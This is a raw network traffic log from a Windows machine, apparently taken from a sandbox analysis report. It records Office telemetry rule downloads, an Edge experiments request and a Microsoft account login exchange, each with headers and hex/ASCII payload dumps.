2024-11-13 19:39:37 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:36 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 86fb44b9-501e-0078-06d2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193936Z-16547b76f7flf9g6hC1DFWmcx80000000800000000011hbm x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:37 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.5	49828	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:38 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:38 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:38 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 229e582e-901e-0083-26d2-2cbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193938Z-16547b76f7f8dwtrhC1DFWd1zn0000000hrg000000009b7u x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:38 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.5	49827	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:38 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:38 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:38 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: a176e845-e01e-0020-7fa1-34de90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193938Z-1749fc9bdbdht5mthC1DFWph9000000001h000000000fv89 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:38 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.5	49825	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:38 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:38 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:38 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: b37f67ef-101e-008d-17ad-3492e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193938Z-r178fb8d765r2t2rhC1DFWa9x000000001f00000000083ud x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:38 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.5	49829	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:38 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:38 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:38 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 96cf3c30-101e-008d-3e69-3592e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193938Z-1749fc9bdbdwv5sghC1DFWwp6n00000001e0000000001b83 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:38 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.5	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:38 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:38 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:38 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 1ec43ba4-f01e-0003-65d2-2c4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193938Z-16547b76f7fcrtpchC1DFW52e80000000hp000000000abvg x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:38 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.5	49840	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:39 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:39 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:39 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 6028abc9-b01e-0002-6508-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193939Z-16547b76f7fj5p7mhC1DFWf8w40000000ht0000000002tu3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:39 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.5	49833	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:39 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:39 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:39 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193939Z-16547b76f7f9rdn9hC1DFWfk7s0000000hk000000000fy59 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:39 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.5	49841	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:39 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:39 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:39 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: c37d6e00-a01e-001e-0178-3549ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193939Z-1749fc9bdbdjjp8thC1DFWye6g00000001ag00000000qknb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:39 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.5	49832	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:39 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:39 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:39 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: d5f81cfa-001e-0017-1dd2-2c0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193939Z-16547b76f7fkcrm9hC1DFWxdag0000000hm000000000x5yr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:39 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	49839	94.245.104.56	443	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:39 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-13 19:39:40 UTC	584	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Wed, 13 Nov 2024 19:39:39 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=9d90d64458d90255b6b35bbdd301682cde81e2f30fd042245a59b55dae0fc551;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=9d90d64458d90255b6b35bbdd301682cde81e2f30fd042245a59b55dae0fc551;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.5	49842	40.126.32.76	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:40 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4742 Host: login.live.com
2024-11-13 19:39:40 UTC	4742	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-13 19:39:40 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Wed, 13 Nov 2024 19:38:40 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C519_BL2 x-ms-request-id: 64fe68dc-440f-43f4-85e9-d1a1361d4e91 PPServer: PPV: 30 H: BL02EPF0001D7E1 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Wed, 13 Nov 2024 19:39:39 GMT Connection: close Content-Length: 10197
2024-11-13 19:39:40 UTC	10197	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 